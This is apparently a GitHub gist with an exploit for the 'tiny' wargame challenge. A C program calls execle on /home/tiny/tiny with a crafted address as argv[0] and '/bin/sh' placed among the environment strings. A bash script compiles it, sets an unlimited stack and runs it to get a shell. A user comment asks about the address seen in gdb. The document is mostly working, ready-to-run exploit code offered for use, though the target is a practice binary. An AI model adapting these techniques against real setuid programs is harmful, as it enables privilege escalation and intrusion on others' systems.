Run pwnable-hackerssecret-tiny.sh and you'll pwn the tiny.
#include <stdio.h> | |
#include <unistd.h> | |
int main() | |
{ | |
char *envp[] = { | |
"env1=1", "env2=2", "env3=3", | |
"/bin/sh", "env5=5", NULL | |
}; | |
execle("/home/tiny/tiny", "\xc8\x75\x55\x55", | |
"A", "A", "A", "A", "A", "A", | |
"A", "A", "A", "A", NULL, envp); | |
return 0; | |
} |
#!/usr/bin/env bash | |
tempfile=$(mktemp -d) | |
echo $tempfile | |
cd $tempfile | |
gcc -xc - -oexp <<\EOF | |
#include <stdio.h> | |
#include <unistd.h> | |
int main() | |
{ | |
char *envp[] = { | |
"env1=1", "env2=2", "env3=3", | |
"/bin/sh", "env5=5", NULL | |
}; | |
execle("/home/tiny/tiny", "\xc8\x75\x55\x55", | |
"A", "A", "A", "A", "A", "A", | |
"A", "A", "A", "A", NULL, envp); | |
return 0; | |
} | |
EOF | |
ulimit -s unlimited | |
exec ./exp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Hi! I have a small question.
Why execve accepts strange second parameter?
During debugging my gdb shows 0xf77??5c8, but 0x555575c8 never.